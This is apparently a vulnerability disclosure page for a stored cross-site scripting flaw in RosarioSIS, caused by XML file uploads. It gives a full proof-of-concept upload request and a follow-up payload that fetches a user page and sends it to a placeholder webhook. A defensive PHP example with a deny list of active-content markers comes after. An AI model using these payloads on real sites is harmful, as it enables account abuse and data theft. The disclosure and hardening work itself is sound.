Cross-site scripting - Stored via upload xml file in francoisjacquet/rosariosis

Valid

Reported on

Apr 23rd 2022


Description

When a user uploads a file with the XML extension, which is in the whitelist, the server stores the XML file at assets/PortalNotesFiles/, so we can access it directly and execute JavaScript code.

Proof of Concept

POST /rosariosis/Modules.php?modname=School_Setup/PortalNotes.php&modfunc=update HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3345002182489293764621537208
Content-Length: 2762
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/rosariosis/Modules.php?modname=School_Setup/PortalNotes.php
Cookie: RosarioSIS=usti6etu55tb38dsu6iq78c1u5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][TITLE]"

<h1>123</h1>
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][CONTENT]"

<h1>123</h1>
![]("/>)
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][SORT_ORDER]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="FILE_ATTACHED_FILE"; filename="aaa.xml"
Content-Type: image/png

<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
        <info>
          <name>
            <value>123</value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][FILE_ATTACHED_EMBED]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][admin]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][teacher]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][parent]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][0]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][1]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][2]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][3]"


-----------------------------3345002182489293764621537208--

PoC images (screenshots not reproduced)

Impact

This vulnerability allows arbitrary JavaScript code execution, stealing the user's cookie, etc.

We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. a year ago
Nhien.IT modified the report
a year ago
Nhien.IT
a year ago

Researcher


Hi @admin, can you contact the maintainer?

We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back a year ago
Jamie Slome
a year ago

Admin


@nhienit2010 - contact has been established with the maintainer, as you can see in the status message above 👍

Let me know if you have any further questions.

François
a year ago

Maintainer


Hello @nhienit2010

Thank you for reporting the issue. The xml file is opened in a new browser tab. As far as my test goes, I was not able to retrieve the session cookie. Were you? If so, please update your example.

François
a year ago

Maintainer


Oh, cookie is set to HttpOnly so it cannot be retrieved.

Now, being in a new tab, the xml file is executed by the browser just like any other file you might open or find on the Internet.

Could you please explain how this could leak user session or other info related to RosarioSIS?

Nhien.IT
a year ago

Researcher


Hello @maintainer,

Because the XML file is uploaded to your website, under the same-origin policy the JavaScript code in the malicious XML can fetch other user information and send it to the attacker's host; sometimes this vulnerability allows the attacker to perform HTTP requests in the victim's browser.

Sample payload

<html>
    <head></head>
    <body>
        <info>
          <name>
<value><![CDATA[<script>fetch("https://www.rosariosis.org/demonstration/Modules.php?modname=Users/User.php").then(r=>r.text()).then(d=>navigator.sendBeacon("https://<my-webhook>", d))</script>]]></value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>

Image PoC (screenshot not reproduced)
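Hardening the upload path from the report description and the same-origin exploitation explained in the reply above, as an added example that is neither RosarioSIS code nor the fix in FileUpload.fnc.php: it rejects browser-renderable uploads by extension and by content, and shows the response headers that make an already-stored file download instead of render. The function and constant names are assumptions.

```php
<?php
// Added example, not RosarioSIS code: two defensive checks for an upload
// handler like the one in the report. All names here are hypothetical.

// Extensions a browser renders as a document that can run script; plain "xml"
// belongs here since the PoC's XHTML-namespaced <script> runs from a .xml file.
const ACTIVE_CONTENT_EXTENSIONS = ['xml', 'xhtml', 'xht', 'svg', 'html', 'htm', 'xsl', 'xslt'];

// Byte markers that make a file dangerous to render whatever its extension.
const ACTIVE_CONTENT_MARKERS = [
    '<script',                       // HTML or namespaced script element
    'http://www.w3.org/1999/xhtml',  // XHTML namespace declaration
    'http://www.w3.org/2000/svg',    // SVG namespace (also allows script)
    '<?xml-stylesheet',              // XSLT can transform XML into HTML
];

// True when the upload must be rejected: renderable extension, or an
// active-content marker anywhere in the body (case-insensitive).
function uploadIsActiveContent(string $filename, string $contents): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if (in_array($ext, ACTIVE_CONTENT_EXTENSIONS, true)) {
        return true;
    }
    $body = strtolower($contents);
    foreach (ACTIVE_CONTENT_MARKERS as $marker) {
        if (strpos($body, strtolower($marker)) !== false) {
            return true;
        }
    }
    return false;
}

// Serving a stored upload: force a download, forbid MIME sniffing, deny script.
function downloadHeaders(string $filename): array
{
    $safeName = preg_replace('/[^A-Za-z0-9._-]+/', '_', basename($filename));
    return [
        'Content-Type'            => 'application/octet-stream',
        'Content-Disposition'     => 'attachment; filename="' . $safeName . '"',
        'X-Content-Type-Options'  => 'nosniff',
        'Content-Security-Policy' => "default-src 'none'; sandbox",
    ];
}

// Constructed sample: the report's PoC document under three file names.
$poc = '<html><body><a:script xmlns:a="http://www.w3.org/1999/xhtml">'
     . 'alert(window.origin)</a:script></body></html>';
foreach (['aaa.xml' => $poc, 'notes.txt' => $poc, 'photo.png' => "\x89PNG\r\n"] as $name => $data) {
    printf("%-10s reject=%s\n", $name, uploadIsActiveContent($name, $data) ? 'yes' : 'no');
}
print_r(downloadHeaders('aaa.xml'));
```

The extension list covers the report's case; an existing deployment should additionally move already-stored uploads behind a handler that emits these headers rather than serving assets/PortalNotesFiles/ statically.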

François Jacquet validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
François Jacquet marked this as fixed in 8.9.5 with commit 90842c a year ago
François Jacquet has been awarded the fix bounty
This vulnerability will not receive a CVE
FileUpload.fnc.php#L842 has been validated